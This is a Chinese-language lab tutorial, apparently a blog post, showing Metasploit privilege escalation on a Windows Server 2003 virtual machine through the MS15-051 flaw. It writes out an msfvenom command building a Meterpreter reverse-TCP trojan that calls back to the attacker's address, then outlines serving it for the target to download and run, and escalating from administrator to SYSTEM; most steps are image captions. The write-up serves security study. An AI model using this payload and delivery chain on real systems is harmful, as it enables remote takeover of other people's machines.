Metasploit利用ms15-051漏洞进行权限提权

Metasploit利用ms15-051漏洞进行权限提权

实验环境

虚拟机:kali-linux(攻击机)
192.168.18.142
Metasploit利用ms15-051漏洞进行权限提权_第1张图片window server 2003(靶机)
192.168.18.146
Metasploit利用ms15-051漏洞进行权限提权_第2张图片

工具:Metasploit
步骤:

1、生成木马文件:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.142 lport=4444 -f exe -o /root/shell.exe

Metasploit利用ms15-051漏洞进行权限提权_第3张图片

2、服务器网站目录上创建个shell文件夹,放置木马文件

复制到网站目录
Metasploit利用ms15-051漏洞进行权限提权_第4张图片
Metasploit利用ms15-051漏洞进行权限提权_第5张图片

3、使用handler模块

在这里插入图片描述

4.设置payload

Metasploit利用ms15-051漏洞进行权限提权_第6张图片

5、exploit开始攻击,等待靶机木马连接

Metasploit利用ms15-051漏洞进行权限提权_第7张图片

6.启动xampp服务(使靶机可以连上攻击机并运行木马文件)

Metasploit利用ms15-051漏洞进行权限提权_第8张图片

7、切换到靶机访问 ”http://192.168.18.142/shell” 下载运行木马

Metasploit利用ms15-051漏洞进行权限提权_第9张图片

8、攻击机成功获取到靶机的shell,使用 “getuid”查看为administrator权限

Metasploit利用ms15-051漏洞进行权限提权_第10张图片

9、使用ms15-051漏洞,进一步获取system最高权限

Metasploit利用ms15-051漏洞进行权限提权_第11张图片

10、设置payload,设置payload参数

Metasploit利用ms15-051漏洞进行权限提权_第12张图片

11、输入“run”攻击成功,使用“getuid”查看已是system用户

Metasploit利用ms15-051漏洞进行权限提权_第13张图片

12、提权成功

Metasploit利用ms15-051漏洞进行权限提权_第14张图片

    本站所有文章均为原创,欢迎转载,请注明文章出处: https://blog.csdn.net/weixin_43847838/article/details/115358473.。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。

你可能感兴趣的:(渗透测试工具,windows漏洞复现,安全漏洞,渗透测试,windows,网络安全,安全)